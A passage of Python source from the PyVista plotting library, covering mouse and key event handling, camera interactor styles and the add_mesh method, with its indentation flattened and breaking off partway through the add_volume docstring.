if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.GetEventPosition()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.GetEventPosition()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks supported
here - use :func:`pyvista.BasePlotter.track_click_position` instead.
"""
if hasattr(self, "iren"):
self._add_observer(vtk.vtkCommand.MouseMoveEvent,
self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self._remove_observer(vtk.vtkCommand.MouseMoveEvent)
def track_click_position(self, callback=None, side="right",
viewport=False):
"""Keep track of the click position.
By default, it only tracks right clicks.
Parameters
----------
callback : callable
A callable method that will use the click position. Passes the
click position as a length two tuple.
side : str
The side of the mouse for the button to track (left or right).
Default is right. Also accepts ``'r'`` or ``'l'``.
viewport: bool
If ``True``, uses the normalized viewport coordinate system
(values between 0.0 and 1.0 and support for HiDPI) when passing the
click position to the callback
"""
if not hasattr(self, "iren"):
return
side = str(side).lower()
if side in ["right", "r"]:
event = vtk.vtkCommand.RightButtonPressEvent
elif side in ["left", "l"]:
event = vtk.vtkCommand.LeftButtonPressEvent
else:
raise TypeError(f"Side ({side}) not supported. Try `left` or `right`")
def _click_callback(obj, event):
self.store_click_position()
if hasattr(callback, '__call__'):
if viewport:
callback(self.click_position)
else:
callback(self.pick_click_position())
self._add_observer(event, _click_callback)
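# Usage sketch (illustrative): pass any callable taking one position argument,
#   plotter.track_click_position(lambda pos: print(pos), side='left')
# With viewport=False the callback receives the picked position from
# pick_click_position(); with viewport=True it receives self.click_position.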
def untrack_click_position(self):
"""Stop tracking the click position."""
if hasattr(self, "_click_observer"):
self.iren.RemoveObserver(self._click_observer)
del self._click_observer
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size and
line width by the given value.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self._add_observer('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('f', self.fly_to_mouse_position)
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
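# Further bindings can be layered on with add_key_event, e.g. (illustrative):
#   plotter.add_key_event('k', lambda: print('k pressed'))
# Callbacks are stored per key in a defaultdict(list), so several callbacks
# may share a single key.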
def key_press_event(self, obj, event):
"""Listen for key press event."""
key = self.iren.GetKeySym()
log.debug(f'Key {key} pressed')
self._last_key = key
if key in self._key_press_event_callbacks.keys():
# Note that defaultdict's will never throw a key error
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
if hasattr(self.ren_win, 'GetOffScreenFramebuffer'):
if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex():
# must raise a runtime error as this causes a segfault on VTK9
raise ValueError('Invoking helper with no framebuffer')
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
"""Update the camera interactor style."""
if self._style_class is None:
# We need an actually custom style to handle button up events
self._style_class = _style_factory(self._style)(self)
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style_class)
def enable_trackball_style(self):
"""Set the interactive style to trackball camera.
The trackball camera is the default interactor style.
"""
self._style = 'TrackballCamera'
self._style_class = None
return self.update_style()
def enable_trackball_actor_style(self):
"""Set the interactive style to trackball actor.
This allows rotating actors around the scene.
"""
self._style = 'TrackballActor'
self._style_class = None
return self.update_style()
def enable_image_style(self):
"""Set the interactive style to image.
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = 'Image'
self._style_class = None
return self.update_style()
def enable_joystick_style(self):
"""Set the interactive style to joystick.
It allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse is not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = 'JoystickCamera'
self._style_class = None
return self.update_style()
def enable_zoom_style(self):
"""Set the interactive style to rubber band zoom.
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = 'RubberBandZoom'
self._style_class = None
return self.update_style()
def enable_terrain_style(self):
"""Set the interactive style to terrain.
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = 'Terrain'
self._style_class = None
return self.update_style()
def enable_rubber_band_style(self):
"""Set the interactive style to rubber band picking.
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = 'RubberBandPick'
self._style_class = None
return self.update_style()
def enable_rubber_band_2d_style(self):
"""Set the interactive style to rubber band 2d.
Camera rotation is not allowed with this interactor style. Zooming
affects the camera's parallel scale only, and assumes that the camera
is in parallel projection mode. The style also draws a rubber
band using the left button. All camera changes invoke
StartInteractionEvent when the button is pressed, InteractionEvent
when the mouse (or wheel) is moved, and EndInteractionEvent when the
button is released. The bindings are as follows: Left mouse - Select
(invokes a SelectionChangedEvent). Right mouse - Zoom.
Middle mouse - Pan. Scroll wheel - Zoom.
"""
self._style = 'RubberBand2D'
self._style_class = None
return self.update_style()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
return
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
return
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self.render()
Plotter.last_update_time = curr_time
elif force_redraw:
self.render()
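# Sketch of a simple animation loop built on update() (assumes the plotter has
# already been shown with a live interactor, e.g. via show(auto_close=False),
# and that `mesh` and `new_points` exist; both are assumptions here):
#   for step in range(n_steps):      # hypothetical loop
#       mesh.points = new_points     # mutate the plotted dataset
#       plotter.update()             # redraw and process interactor events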
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
culling=None, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, render=True, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalars range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalars array from the mesh to
the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custom made transfer
function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result in showing colors that are not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
on the object will be used. If a string name is given, it
will pull a texture with that name associated to the input
mesh.
render_points_as_spheres : bool, optional
render_lines_as_tubes : bool, optional
smooth_shading : bool, optional
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0
diffuse : float, optional
The diffuse lighting coefficient. Default 1.0
specular : float, optional
The specular lighting coefficient. Default 0.0
specular_power : float, optional
The specular power. Between 0.0 and 128.0
nan_color : string or 3 item list, optional, defaults to gray
The color to use for all ``NaN`` values in the plotted scalar
array.
nan_opacity : float, optional
Opacity of ``NaN`` values. Should be between 0 and 1.
Default 1.0
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults to ``False``.
rgb : bool, optional
If a 2-dimensional array is passed as the scalars, plot those
values as RGB(A) colors! ``rgba`` is also accepted alias for this.
Opacity (the A) is optional.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
use_transparency : bool, optional
Invert the opacity mappings and make the values correspond to
transparency.
below_color : string or 3 item list, optional
Solid color for values below the scalars range (``clim``). This
will automatically set the scalar bar ``below_label`` to
``'Below'``
above_color : string or 3 item list, optional
Solid color for values above the scalars range (``clim``). This
will automatically set the scalar bar ``above_label`` to
``'Above'``
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are the
string annotations.
pickable : bool
Set whether this mesh is pickable
Return
------
actor: vtk.vtkActor
VTK actor of the mesh.
"""
# Convert the VTK data object to a pyvista wrapped object if necessary
if not is_pyvista_dataset(mesh):
mesh = wrap(mesh)
if not is_pyvista_dataset(mesh):
raise TypeError(f'Object type ({type(mesh)}) not supported for plotting in PyVista.')
##### Parse arguments to be used for all meshes #####
if scalar_bar_args is None:
scalar_bar_args = {}
if show_edges is None:
show_edges = rcParams['show_edges']
if edge_color is None:
edge_color = rcParams['edge_color']
if show_scalar_bar is None:
show_scalar_bar = rcParams['show_scalar_bar']
if lighting is None:
lighting = rcParams['lighting']
# supported aliases
clim = kwargs.pop('rng', clim)
cmap = kwargs.pop('colormap', cmap)
culling = kwargs.pop("backface_culling", culling)
if render_points_as_spheres is None:
render_points_as_spheres = rcParams['render_points_as_spheres']
if name is None:
name = f'{type(mesh).__name__}({mesh.memory_address})'
if nan_color is None:
nan_color = rcParams['nan_color']
nan_color = list(parse_color(nan_color))
nan_color.append(nan_opacity)
if color is True:
color = rcParams['color']
if texture is False:
texture = None
if culling is True:
culling = 'backface'
rgb = kwargs.pop('rgba', rgb)
if "scalar" in kwargs:
raise TypeError("`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?")
assert_empty_kwargs(**kwargs)
##### Handle composite datasets #####
if isinstance(mesh, pyvista.MultiBlock):
# first check the scalars
if clim is None and scalars is not None:
# Get the data range across the array for all blocks
# if scalars specified
if isinstance(scalars, str):
clim = mesh.get_data_range(scalars)
else:
# TODO: an array was given... how do we deal with
# that? Possibly a 2D arrays or list of
# arrays where first index corresponds to
# the block? This could get complicated real
# quick.
raise TypeError('scalars array must be given as a string name for multiblock datasets.')
the_arguments = locals()
the_arguments.pop('self')
the_arguments.pop('mesh')
the_arguments.pop('kwargs')
if multi_colors:
# Compute unique colors for each index of the block
if has_matplotlib:
from itertools import cycle
cycler = matplotlib.rcParams['axes.prop_cycle']
colors = cycle(cycler)
else:
multi_colors = False
logging.warning('Please install matplotlib for color cycles')
# Now iteratively plot each element of the multiblock dataset
actors = []
for idx in range(mesh.GetNumberOfBlocks()):
if mesh[idx] is None:
continue
# Get a good name to use
next_name = f'{name}-{idx}'
# Get the data object
if not is_pyvista_dataset(mesh[idx]):
data = wrap(mesh.GetBlock(idx))
if not is_pyvista_dataset(mesh[idx]):
continue # move on if we can't plot it
else:
data = mesh.GetBlock(idx)
if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1):
# Note that a block can exist but be None type
# or it could have zeros points (be empty) after filtering
continue
# Now check that scalars is available for this dataset
if isinstance(data, vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None:
ts = None
else:
ts = scalars
if multi_colors:
color = next(colors)['color']
## Add to the scene
the_arguments['color'] = color
the_arguments['scalars'] = ts
the_arguments['name'] = next_name
the_arguments['texture'] = None
a = self.add_mesh(data, **the_arguments)
actors.append(a)
if (reset_camera is None and not self.camera_set) or reset_camera:
cpos = self.get_default_cam_pos()
self.camera_position = cpos
self.camera_set = False
self.reset_camera()
return actors
##### Plot a single PyVista mesh #####
# Compute surface normals if using smooth shading
if smooth_shading:
# extract surface if mesh is exterior
if not isinstance(mesh, pyvista.PolyData):
grid = mesh
mesh = grid.extract_surface()
ind = mesh.point_arrays['vtkOriginalPointIds']
# remap scalars
if isinstance(scalars, np.ndarray):
scalars = scalars[ind]
if texture:
_tcoords = mesh.t_coords
mesh.compute_normals(cell_normals=False, inplace=True)
if texture:
mesh.t_coords = _tcoords
if mesh.n_points < 1:
raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.')
# Try to plot something if no preference given
if scalars is None and color is None and texture is None:
# Prefer texture first
if len(list(mesh.textures.keys())) > 0:
texture = True
# If no texture, plot any active scalar
else:
# Make sure scalars components are not vectors/tuples
scalars = mesh.active_scalars_name
# Don't allow plotting of string arrays by default
if scalars is not None:# and np.issubdtype(mesh.active_scalars.dtype, np.number):
if stitle is None:
stitle = scalars
else:
scalars = None
# set main values
self.mesh = mesh
self.mapper = make_mapper(vtk.vtkDataSetMapper)
self.mapper.SetInputData(self.mesh)
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
actor = vtk.vtkActor()
prop = vtk.vtkProperty()
actor.SetMapper(self.mapper)
actor.SetProperty(prop)
# Make sure scalars is a numpy array after this point
original_scalar_name = None
if isinstance(scalars, str):
self.mapper.SetArrayName(scalars)
original_scalar_name = scalars
scalars = get_array(mesh, scalars,
preference=preference, err=True)
if stitle is None:
stitle = original_scalar_name
if texture is True or isinstance(texture, (str, int)):
texture = mesh._activate_texture(texture)
if texture:
if isinstance(texture, np.ndarray):
texture = numpy_to_texture(texture)
if not isinstance(texture, (vtk.vtkTexture, vtk.vtkOpenGLTexture)):
raise TypeError(f'Invalid texture type ({type(texture)})')
if mesh.GetPointData().GetTCoords() is None:
raise ValueError('Input mesh does not have texture coordinates to support the texture.')
actor.SetTexture(texture)
# Set color to white by default when using a texture
if color is None:
color = 'white'
if scalars is None:
show_scalar_bar = False
self.mapper.SetScalarModeToUsePointFieldData()
# Handle making opacity array =========================================
_custom_opac = False
if isinstance(opacity, str):
try:
# Get array from mesh
opacity = get_array(mesh, opacity,
preference=preference, err=True)
if np.any(opacity > 1):
warnings.warn("Opacity scalars contain values over 1")
if np.any(opacity < 0):
warnings.warn("Opacity scalars contain values less than 0")
_custom_opac = True
except:
# Or get opacity transfer function
opacity = opacity_transfer_function(opacity, n_colors)
else:
if scalars.shape[0] != opacity.shape[0]:
raise ValueError('Opacity array and scalars array must have the same number of elements.')
elif isinstance(opacity, (np.ndarray, list, tuple)):
opacity = np.array(opacity)
if scalars.shape[0] == opacity.shape[0]:
# User could pass an array of opacities for every point/cell
_custom_opac = True
else:
opacity = opacity_transfer_function(opacity, n_colors)
if use_transparency and np.max(opacity) <= 1.0:
opacity = 1 - opacity
elif use_transparency and isinstance(opacity, np.ndarray):
opacity = 255 - opacity
# Scalars formatting ==================================================
if cmap is None: # Set default map if matplotlib is available
if has_matplotlib:
cmap = rcParams['cmap']
# Set the array title for when it is added back to the mesh
if _custom_opac:
title = '__custom_rgba'
elif stitle is None:
title = 'Data'
else:
title = stitle
if scalars is not None:
# ensure scalars is a NumPy array (string names were resolved to arrays above)
if not isinstance(scalars, np.ndarray):
scalars = np.asarray(scalars)
_using_labels = False
if not np.issubdtype(scalars.dtype, np.number):
# raise TypeError('Non-numeric scalars are currently not supported for plotting.')
# TODO: If str array, digitize and annotate
cats, scalars = np.unique(scalars.astype('|S'), return_inverse=True)
values = np.unique(scalars)
clim = [np.min(values) - 0.5, np.max(values) + 0.5]
title = f'{title}-digitized'
n_colors = len(cats)
scalar_bar_args.setdefault('n_labels', 0)
_using_labels = True
if rgb:
if scalars.ndim != 2 or scalars.shape[1] < 3 or scalars.shape[1] > 4:
raise ValueError('RGB array must be n_points/n_cells by 3/4 in shape.')
if scalars.ndim != 1:
if rgb:
pass
elif scalars.ndim == 2 and (scalars.shape[0] == mesh.n_points or scalars.shape[0] == mesh.n_cells):
scalars = np.linalg.norm(scalars.copy(), axis=1)
title = f'{title}-normed'
else:
scalars = scalars.ravel()
if scalars.dtype == np.bool_:
scalars = scalars.astype(np.float_)
def prepare_mapper(scalars):
# Scalars interpolation approach
if scalars.shape[0] == mesh.n_points:
self.mesh._add_point_array(scalars, title, True)
self.mapper.SetScalarModeToUsePointData()
elif scalars.shape[0] == mesh.n_cells:
self.mesh._add_cell_array(scalars, title, True)
self.mapper.SetScalarModeToUseCellData()
else:
raise_not_matching(scalars, mesh)
# Common tasks
self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors)
if interpolate_before_map:
self.mapper.InterpolateScalarsBeforeMappingOn()
if rgb or _custom_opac:
self.mapper.SetColorModeToDirectScalars()
else:
self.mapper.SetColorModeToMapScalars()
return
prepare_mapper(scalars)
table = self.mapper.GetLookupTable()
if log_scale:
table.SetScaleToLog10()
if _using_labels:
table.SetAnnotations(convert_array(values), convert_string_array(cats))
if isinstance(annotations, dict):
for val, anno in annotations.items():
table.SetAnnotation(float(val), str(anno))
# Set scalars range
if clim is None:
clim = [np.nanmin(scalars), np.nanmax(scalars)]
elif isinstance(clim, float) or isinstance(clim, int):
clim = [-clim, clim]
if np.any(clim) and not rgb:
self.mapper.scalar_range = clim[0], clim[1]
table.SetNanColor(nan_color)
if above_color:
table.SetUseAboveRangeColor(True)
table.SetAboveRangeColor(*parse_color(above_color, opacity=1))
scalar_bar_args.setdefault('above_label', 'Above')
if below_color:
table.SetUseBelowRangeColor(True)
table.SetBelowRangeColor(*parse_color(below_color, opacity=1))
scalar_bar_args.setdefault('below_label', 'Below')
if cmap is not None:
if not has_matplotlib:
cmap = None
logging.warning('Please install matplotlib for color maps.')
cmap = get_cmap_safe(cmap)
if categories:
if categories is True:
n_colors = len(np.unique(scalars))
elif isinstance(categories, int):
n_colors = categories
ctable = cmap(np.linspace(0, 1, n_colors))*255
ctable = ctable.astype(np.uint8)
# Set opacities
if isinstance(opacity, np.ndarray) and not _custom_opac:
ctable[:,-1] = opacity
if flip_scalars:
ctable = np.ascontiguousarray(ctable[::-1])
table.SetTable(VN.numpy_to_vtk(ctable))
if _custom_opac:
# need to round the colors here since we're
# directly displaying the colors
hue = normalize(scalars, minimum=clim[0], maximum=clim[1])
scalars = np.round(hue*n_colors)/n_colors
scalars = cmap(scalars)*255
scalars[:, -1] *= opacity
scalars = scalars.astype(np.uint8)
prepare_mapper(scalars)
else: # no cmap specified
if flip_scalars:
table.SetHueRange(0.0, 0.66667)
else:
table.SetHueRange(0.66667, 0.0)
else:
self.mapper.SetScalarModeToUseFieldData()
# Set actor properties ================================================
# select view style
if not style:
style = 'surface'
style = style.lower()
if style == 'wireframe':
prop.SetRepresentationToWireframe()
if color is None:
color = rcParams['outline_color']
elif style == 'points':
prop.SetRepresentationToPoints()
elif style == 'surface':
prop.SetRepresentationToSurface()
else:
raise ValueError('Invalid style. Must be one of the following:\n'
'\t"surface"\n'
'\t"wireframe"\n'
'\t"points"\n')
prop.SetPointSize(point_size)
prop.SetAmbient(ambient)
prop.SetDiffuse(diffuse)
prop.SetSpecular(specular)
prop.SetSpecularPower(specular_power)
if smooth_shading:
prop.SetInterpolationToPhong()
else:
prop.SetInterpolationToFlat()
# edge display style
if show_edges:
prop.EdgeVisibilityOn()
rgb_color = parse_color(color)
prop.SetColor(rgb_color)
if isinstance(opacity, (float, int)):
prop.SetOpacity(opacity)
prop.SetEdgeColor(parse_color(edge_color))
if render_points_as_spheres:
prop.SetRenderPointsAsSpheres(render_points_as_spheres)
if render_lines_as_tubes:
prop.SetRenderLinesAsTubes(render_lines_as_tubes)
# legend label
if label:
if not isinstance(label, str):
raise TypeError('Label must be a string')
geom = pyvista.single_triangle()
if scalars is not None:
geom = pyvista.Box()
rgb_color = parse_color('black')
geom.points -= geom.center
self._labels.append([geom, label, rgb_color])
# lighting display style
if not lighting:
prop.LightingOff()
# set line thickness
if line_width:
prop.SetLineWidth(line_width)
# Add scalar bar if available
if stitle is not None and show_scalar_bar and (not rgb or _custom_opac):
self.add_scalar_bar(stitle, **scalar_bar_args)
self.add_actor(actor,
reset_camera=reset_camera,
name=name, culling=culling,
pickable=pickable,
render=render)
self.renderer.Modified()
return actor
def add_volume(self, volume, scalars=None, clim=None, resolution=None,
opacity='linear', n_colors=256, cmap=None, flip_scalars=False,
reset_camera=None, name=None, ambient=0.0, categories=False,
culling=False, multi_colors=False,
blending='composite', mapper=None,
stitle=None, scalar_bar_args=None, show_scalar_bar=None,
annotations=None, pickable=True, preference="point",
opacity_unit_distance=None, shade=False,
diffuse=0.7, specular=0.2, specular_power=10.0, **kwargs):
"""Add a volume, rendered using a smart mapper by default.
Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`.
Parameters
----------
volume : 3D numpy.ndarray or pyvista.UniformGrid
The input volume to visualize. 3D numpy arrays are accepted.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If ``scalars`` is
``None``, then the active scalars are used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
opacity : string or numpy.ndarray, optional
Opacity mapping for the scalars array.
A string can also be specified to map the scalars range to a
predefined opacity transfer function (options include: 'linear',
'linear_r', 'geom', 'geom_r'). Or you can pass a custom made
transfer function that is an array either ``n_colors`` in length or
shorter.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
cmap : str, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
reset_camera : bool, optional
Reset the camera after adding this volume to the scene.
name : str, optional
The name for the added actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
ambient : float, optional
When lighting is enabled, this is the amount of light from
0 to 1 that reaches the actor when not directed at the
light source emitted from the viewer. Default 0.0.
culling : str, optional
Does not render faces that are culled. Options are ``'front'`` or
``'back'``. This can be helpful for dense surface meshes,
especially when edges are visible, but can cause flat
meshes to be partially displayed. Defaults ``False``.
categories : bool, optional
If set to ``True``, then the number of unique values in the scalar
array will be used as the ``n_colors`` argument.
multi_colors : bool, optional
Whether or not to use multiple colors when plotting MultiBlock
object. Blocks will be colored sequentially as 'Reds', 'Greens',
'Blues', and 'Grays'.
blending : str, optional
Blending mode for visualisation of the input object(s). Can be
one of 'additive', 'maximum', 'minimum', 'composite', or
'average'. Defaults to 'composite'.
mapper : str, optional
Volume mapper to use given by name. Options include:
``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``.
If ``None`` the ``"volume_mapper"`` in the ``rcParams`` is used.
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of
the scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
annotations : dict, optional
Pass a dictionary of annotations. Keys are the float values in the
scalars range to annotate on the scalar bar and the values are
the string annotations.
opacity_unit_distance : float
Set/Get the unit distance on which the scalar opacity transfer
function is defined. Meaning that over that distance, a given
opacity (from the transfer function) is accumulated. This is
adjusted for the actual sampling distance during rendering. By
default, this is the length of the diagonal of the bounding box of
the volume divided by the dimensions.
shade : bool
Default off. If shading is turned on, the mapper may perform
shading calculations - in some cases shading does not apply
(for example, in a maximum intensity projection) and therefore
shading will not be performed even if this flag is on.
diffuse : float, optional
The diffuse lighting coefficient. Default 0.7.
specular : float, optional
The specular lighting coefficient. Default 0.2.
specular_power : float, optional
The specular power. Between 0.0 and 128.0. Default 10.0.
Return
------
